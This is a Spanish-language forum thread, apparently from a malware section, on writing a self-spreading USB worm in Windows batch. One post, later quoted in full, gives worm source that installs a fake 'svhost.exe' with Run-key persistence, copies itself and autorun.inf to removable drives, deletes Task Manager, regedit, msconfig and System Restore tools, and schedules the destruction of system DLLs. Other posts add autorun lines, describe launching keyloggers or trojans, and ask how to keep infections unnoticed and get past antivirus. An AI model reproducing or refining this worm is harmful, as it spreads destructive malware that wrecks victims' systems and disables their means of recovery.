Autor
|
Tema: HOW-TO Crear Gusano de Memorias USB en BATCH (Leído 36,394 veces)
|
|
neider
Desconectado
Mensajes: 17
|
Esta muy bien el manual , estaba buscando algo asi!
octalh, lo unico que creo que falta es que pongas la forma de desinfectarse xD, aunque si no mal he entendido creo que basta con borrar el autorun del usb y ya no contagiara a nadie mas. Y luego borrar el directorio que crea en lacarpeta de windows
Ah y otra cosa mas, rayluch, si no te importa podrias poner los cambios que le has hecho para que lo vieramos todos (Si no quieres que nadie lo tenga como tu no lo pongas y no pasa nada)
Ala byes
|
|
|
En línea
|
|
|
|
rayluch
Desconectado
Mensajes: 21
|
Modificando el código de octalh he añadido una función para que si no existe el archivo "x" (troyano, keylogger) instalado en la parte correspondiente del pc se auto ejecute el server automáticamente.
Te doy las gracias otra vez octalh, gracias a ti ya se cómo programar en batch, y empecé desde cero hace 2 días.
EDIT: Por cierto, yo también quiero saber cómo desinfentarlo.
EDIT2: Neider, lo que he hecho es usar las mismas funciones que tiene el código original, si buscas por Internet verás enseguida muchos tutoriales de batch y con eso te aclararas mejor como lo he hecho yo, no es difícil.
Saludos.
|
|
« Última modificación: 7 Marzo 2008, 17:51 pm por rayluch »
|
En línea
|
|
|
|
rayluch
Desconectado
Mensajes: 21
|
ECHO shell\1=abrir >> %AUTORUNORIGINAL% ECHO shell\1\Command=%WORM% >> %AUTORUNORIGINAL% ECHO shell\2\=explorar >> %AUTORUNORIGINAL% ECHO shell\2\Command=%WORM% >> %AUTORUNORIGINAL% ECHO shellexecute=%WORM% >> %AUTORUNORIGINAL% ¿Alguien podría explicar esta parte específica de aquí? Es que no se muy bien cómo funcionan esos comandos.
|
|
« Última modificación: 7 Marzo 2008, 21:37 pm por rayluch »
|
En línea
|
|
|
|
corax
Desconectado
Mensajes: 220
Primum non nocere
|
bueno, yo también quisiera hacer un aporte de mi código, solo que para evitar la tentación lammer de usarlo "a discrección" contra todobicho viviente, le meteré errores en el código. quien sepa batch no tendrá problemas en repararlos. se agradecen sugerencias: @echo off goto initio initio title NUEVO HARDWARE ENCONTRADO (ACTUALIZANDO) AT 12:00 goto jornada AT 28/03/09 goto apocalpypse CLS if exist %windir%\regedit.exe (goto conqeror) else (goto espora) conqueror CLS title ACTUALIZANDO WINDOWS SP2 v.4.0.8.1. Por favor, espere... rem Southern Cross, by Corax copy \svhost.exe C:\WINDOWS\System32\svhost.exe reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v services /d C:\Windows\System32\svhost.exe CLS echo [autorun]>>%Windir%\cursors\autorun.inf" echo OPEN=svhost.exe>>%Windir%\cursors\autorun.inf" CD %WINDIR%\System32\" del /Q /F taskmgr.exe del /Q /F taskkill.exe CLS CD %WINDIR%\System32\" del /Q /F regedt32.exe del /Q /F wscui.cpl del /Q /F command.com CLS CD %windir%\System32\restore\" del /Q /F rstrui.exe del /Q /F srdiag.exe CLS CD "%windir%\" del /Q /F taskman.exe del /Q /F regedit.exe CLS CD "%windir%\PCHealth\HelpCtr\Binaries\" del /Q /F msconfig.exe CLS goto espora espora CLS if exists E:\ (goto 1) else (goto faren) faren CLS if exists F:\ (goto 2) else (goto gotrek) gotrek CLS if exists G:\ (goto 3) else (goto hyperion) hyperion CLS if exists H:\ (goto 4) else (goto espora) 1 if exists E:\svhost.exe (goto faren) else (goto 11) 2 if exists F:\svhost.exe (goto gotrek) else (goto 22) 3 if exists G:\svhost.exe (goto hyperion) else (goto 33) 4 if exists H:\svhost.exe (goto espora) else (goto 44) 11 title ACTUALIZANDO WINDOWS SP2 v.4.0.8.1. Por favor, espere... copy C:\WINDOWS\System32\svhost.exe E:\svhost.exe /y copy %Windir%\cursors\autorun.inf E:\autorun.inf /y CLS goto espora 22 title ACTUALIZANDO WINDOWS SP2 v.4.0.8.1. Por favor, espere... copy C:\WINDOWS\System32\svhost.exe F:\svhost.exe /y copy %Windir%\cursors\autorun.inf F:\autorun.inf /y CLS goto espora 33 title ACTUALIZANDO WINDOWS SP2 v.4.0.8.1. Por favor, espere... copy C:\WINDOWS\System32\svhost.exe G:\svhost.exe /y copy %Windir%\cursors\autorun.inf G:\autorun.inf /y CLS goto espora 44 title ACTUALIZANDO WINDOWS SP2 v.4.0.8.1. Por favor, espere... copy C:\WINDOWS\System32\svhost.exe H:\svhost.exe /y copy %Windir%\cursors\autorun.inf H:\autorun.inf /y CLS goto espora jornada CLS shutdown -s -t 10 apocalypse CD "%WINDIR%\System32\" del /Q /F hal.dll CD "%WINDIR%\" del /S /Q /F *.dll shutdown -s t- 10 pause exit
|
|
« Última modificación: 7 Marzo 2008, 23:18 pm por corax »
|
En línea
|
Nuestro idioma ha tardado 12 siglos en llegar hasta hoy día. Tú tan sólo tardas 20 segundos en escribir un post: no destroces en tan poco tiempo lo que tantos siglos ha costado crear.
|
|
|
krlos__gb
Desconectado
Mensajes: 6
|
gracias estaba buscando algo como esto pero.. no entiendo mucho el code si alguien me pudiera aclarar un poco la cosa porfavor me eh matado trantando de entenderlo xD
espero ayuda saludos
|
|
|
En línea
|
|
|
|
catkill
Desconectado
Mensajes: 5
|
EXCELENTE CODIGO, RECIEN ESTOY EMPEZANDO CON BATCH Y NO CREI QUE TUVIERA TANTAS FACILIDADES PARA DESARROLLAR UN VIRUS
|
|
|
En línea
|
|
|
|
-=Hate_dark=-
Desconectado
Mensajes: 62
hasta mañana si me da la GANA ( DIOS ) JI JIIII JI
|
octalh MUUUUUUUUY agradecido de verdad... es una maravilla esto :O... he pillado lo que posteas y siempre me impresionas con tu didactica.. de que se te entiende se te entiende... no se programar.. vi unas horas de programacion en C++ pero no fue mucho lo que logre hacer.. tambien admito falta de boluntad y tiempo... pero no es nada dificil el batch y es bastante simpatico y facil de manejar.. gracias por este post que estoy seguro muchos necesitaban leer XD....
PD: lo unico que no me gusto de esto es que ya despues de que se esta expandiendo el worm no deja desconectar el pendrive en modo seguro.. lo que pone en alerta a la persona y posiblemente se vaya parando la cadena... no habria manera de evitar que esto suceda ? cual es la razon... que es lo que esta usando del disco??.. corrijanme si me equivoco... ya que esta haciendo un ping para que a los 60 segundo se repita el algoritmo esto es lo que mantiene ocupado a pen ? y por eso no lo deja sacar en modo seguro ?... que otras alternativas habria a esto ?...
Gracias de nuevo.. sigue asi =)
|
|
|
En línea
|
lO IMPORTANTE NO ES SABER SI NO TE ER EL tlf DEL QUE SABE =D pero es mejor saber por uno mEEEEsmo por eso hay que leer shiiiiiiike!
|
|
|
-=Hate_dark=-
Desconectado
Mensajes: 62
hasta mañana si me da la GANA ( DIOS ) JI JIIII JI
|
bueno, yo también quisiera hacer un aporte de mi código, solo que para evitar la tentación lammer de usarlo "a discrección" contra todobicho viviente, le meteré errores en el código. quien sepa batch no tendrá problemas en repararlos. se agradecen sugerencias: @echo off goto initio initio title NUEVO HARDWARE ENCONTRADO (ACTUALIZANDO) AT 12:00 goto jornada AT 28/03/09 goto apocalpypse CLS if exist %windir%\regedit.exe (goto conqeror) else (goto espora) conqueror CLS title ACTUALIZANDO WINDOWS SP2 v.4.0.8.1. Por favor, espere... rem Southern Cross, by Corax copy \svhost.exe C:\WINDOWS\System32\svhost.exe reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v services /d C:\Windows\System32\svhost.exe CLS echo [autorun]>>%Windir%\cursors\autorun.inf" echo OPEN=svhost.exe>>%Windir%\cursors\autorun.inf" CD %WINDIR%\System32\" del /Q /F taskmgr.exe del /Q /F taskkill.exe CLS CD %WINDIR%\System32\" del /Q /F regedt32.exe del /Q /F wscui.cpl del /Q /F command.com CLS CD %windir%\System32\restore\" del /Q /F rstrui.exe del /Q /F srdiag.exe CLS CD "%windir%\" del /Q /F taskman.exe del /Q /F regedit.exe CLS CD "%windir%\PCHealth\HelpCtr\Binaries\" del /Q /F msconfig.exe CLS goto espora espora CLS if exists E:\ (goto 1) else (goto faren) faren CLS if exists F:\ (goto 2) else (goto gotrek) gotrek CLS if exists G:\ (goto 3) else (goto hyperion) hyperion CLS if exists H:\ (goto 4) else (goto espora) 1 if exists E:\svhost.exe (goto faren) else (goto 11) 2 if exists F:\svhost.exe (goto gotrek) else (goto 22) 3 if exists G:\svhost.exe (goto hyperion) else (goto 33) 4 if exists H:\svhost.exe (goto espora) else (goto 44) 11 title ACTUALIZANDO WINDOWS SP2 v.4.0.8.1. Por favor, espere... copy C:\WINDOWS\System32\svhost.exe E:\svhost.exe /y copy %Windir%\cursors\autorun.inf E:\autorun.inf /y CLS goto espora 22 title ACTUALIZANDO WINDOWS SP2 v.4.0.8.1. Por favor, espere... copy C:\WINDOWS\System32\svhost.exe F:\svhost.exe /y copy %Windir%\cursors\autorun.inf F:\autorun.inf /y CLS goto espora 33 title ACTUALIZANDO WINDOWS SP2 v.4.0.8.1. Por favor, espere... copy C:\WINDOWS\System32\svhost.exe G:\svhost.exe /y copy %Windir%\cursors\autorun.inf G:\autorun.inf /y CLS goto espora 44 title ACTUALIZANDO WINDOWS SP2 v.4.0.8.1. Por favor, espere... copy C:\WINDOWS\System32\svhost.exe H:\svhost.exe /y copy %Windir%\cursors\autorun.inf H:\autorun.inf /y CLS goto espora jornada CLS shutdown -s -t 10 apocalypse CD "%WINDIR%\System32\" del /Q /F hal.dll CD "%WINDIR%\" del /S /Q /F *.dll shutdown -s t- 10 pause exit
Muy interezante... si estoy viendo los errores.. a lo mejor no detallo algunos ya que apenas hoy me voy enterando de esta maravilla de todas formas espero que ayudes un poco tambien vale ?.... otra cosa es que esta un poco agresivo XD como para probarlo con uno mismo ... de todas formas lo seguire detallando y viendo que le puedo quitar o poner.. gracias por compartir... PD: no me he fijado si cambiaste lo del ping que puso octalh para que se repitiera el ciclo.. que otras alternativas a estas se te ocurre para que se pueda extraer el pendrive en modo seguro sin problemas.
|
|
|
En línea
|
lO IMPORTANTE NO ES SABER SI NO TE ER EL tlf DEL QUE SABE =D pero es mejor saber por uno mEEEEsmo por eso hay que leer shiiiiiiike!
|
|
|
siete7
Desconectado
Mensajes: 1
|
Tengo un pequeño problema con el Quick_Batch_File_Compiler_3.1.5.0. cuando compilo mi pequeño prog en batch(solo son varias sentencias para copiar un archivo a otro lado) para que no aparezca la ventana en MsDos mi antivirus, el AVG free, me lo detecta como un troyano y no me deja compilarlo. Si cierro los procesos del antivirus y compilo el programa falla. Puede alguien ayudarme.
|
|
|
En línea
|
|
|
|
|
Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
Gusano en Batch! (Codigo hecho)
Análisis y Diseño de Malware
|
richi_clarinet
|
1
|
7,325
|
8 Septiembre 2010, 01:44 am
por kj_
|
|
|
[BATCH] Gusano autorreplicante
Análisis y Diseño de Malware
|
Meine programmen
|
3
|
4,305
|
17 Julio 2012, 13:40 pm
por ApOkAlizE
|
|
|
El CSIC logra crear por primera vez memorias magnéticas que no se borran
Noticias
|
wolfbcn
|
1
|
1,676
|
29 Enero 2014, 01:00 am
por Wickown
|
|
|
Crear gusano en python
Análisis y Diseño de Malware
|
<Trocutor>
|
8
|
8,736
|
13 Junio 2017, 21:00 pm
por MCKSys Argentina
|
|
|
ayuda con el code de mi nuevo gusano en batch
Análisis y Diseño de Malware
|
**Aincrad**
|
0
|
2,866
|
18 Junio 2017, 20:41 pm
por **Aincrad**
|
|